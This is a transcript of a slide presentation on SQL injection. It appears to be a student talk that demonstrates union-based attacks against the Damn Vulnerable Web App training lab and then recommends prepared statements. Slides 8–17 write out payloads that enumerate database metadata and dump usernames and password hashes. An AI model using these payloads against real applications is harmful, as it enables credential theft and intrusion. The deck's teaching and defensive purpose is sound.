Presentation is loading. Please wait.

Presentation is loading. Please wait.

SQL Injection By Wenonah Abadilla. Topics What is SQL What is SQL Injection Damn Vulnerable Web App SQLI Demo Prepared Statements.

Similar presentations


Presentation on theme: "SQL Injection By Wenonah Abadilla. Topics What is SQL What is SQL Injection Damn Vulnerable Web App SQLI Demo Prepared Statements."— Presentation transcript:

1 SQL Injection By Wenonah Abadilla

2 Topics What is SQL What is SQL Injection Damn Vulnerable Web App SQLI Demo Prepared Statements

3 What is SQL? Way you communicate with the database Structured Query Language Access and manipulate databases COSC 341 at IUP

4 What is SQL Injection? One of the most serious threats for Web Application Inject SQL commands into an SQL statement, via web page input. Alters an SQL statement and compromises the security of a web application Common with PHP and ASP applications due to the prevalence of older functional interfaces Occurs when Data enters a program from an untrusted source. The data used to dynamically construct a SQL query SQL Injection Harvesting SQL statements to render sensitive data

5 Types of SQLI Error Based Causes an error and gather information from the error Union Based Combine two or more SQL statements into one result Blind Asking a true or false question

6 Consequences of SQL Injection Confidentiality Authentication Authorization Integrity

7 Damn Vulnerable Web Site Demo PHP/MySQL web application Aid for security professionals Test skills and tools in a legal environment Help developers better understand the process of securing web applications

8 $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘$id’”;

9 Basic Injection Webpage is supposed to print ID, First name, and Surname $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘1’”;

10 Always True Scenario Saying display all records that are false and all records that are true %’ – probably not equal to anything, and will be false ‘0’=‘0’ – Is equal to true, because 0 will always equal 0 $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or ‘0’=‘0’”;

11 Display Database Version Notice the last displayed line This is the version of the mysql database $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or 0=0 union select null, version() # “;

12 Display Database User Notice the last displayed line Name of the database user that executed the behind the scenes PHP code $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or 0=0 union select null, user() # ;

13 Display Database Name Notice the last displayed line This is the name of the database $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or 0=0 union select null, database() # ;

14 Display All Tables in the information_schema Displays all the tables in the information_schema database INFORMATION_SCHEMA is the informational database Stores information about all other databases that the MySQL server maintains $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or 0=0 union select null, table_name from information_schema.tables #” ;

15 Display All User Tables in the information_schema Quicker than looking through the previous output and manually looking for user table $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or 0=0 union select null, table_name from information_schema.tables where table_name like ‘user%’ #” ; Displays all tables that start with the prefix “user” in the information_schema database

16 Display all Column fields in the User Table Displays all the columns in the users table Notice- user_id, first_name, last_name, user and password column $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #” ;

17 Display column Field Contents in the user table Successfully displayed all the necessary authentication information in the database $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%' and 1=0 union select null,concat(first_name,0x0a,last_name,0x0a,user, 0x0a,password) from users #” ;

18 Prepared Statements and Bound Parameters The query and the data are sent to the SQL server separately Parameterized statements, Parameterized SQL Template for SQL Statements Values can be plugged into the query after the query is “prepared” and ready to be executed (?), Bound Parameters Placeholders where actual values are plugged in

19 Examples Java using JDBC Statements sets “?” to an actual value that is stored in the id variable PHP using PDO

20 Conclusion SQLI huge threat to web applications Use Prepared SQL Statements Download Damn Vulnerable Web App Questions?

21 Reference Page "Coding Dynamic SQL Statements." Oracle Docs. Oracle, n.d. Web. 18 Feb. 2015.. "(Damn Vulnerable Web App (DVWA): Lesson 6)." Computer Security Student. N.p., n.d. Web. 17 Feb. 2015.. "PHP Prepared Statements." W3schools. N.p., n.d. Web. 18 Feb. 2015.. "SQL Injection." OWASP. N.p., 14 Aug. 2014. Web. 19 Feb. 2015.. "SQL Injection." W3school. N.p., n.d. Web. 15 Feb. 2015..


Download ppt "SQL Injection By Wenonah Abadilla. Topics What is SQL What is SQL Injection Damn Vulnerable Web App SQLI Demo Prepared Statements."

Similar presentations


Ads by Google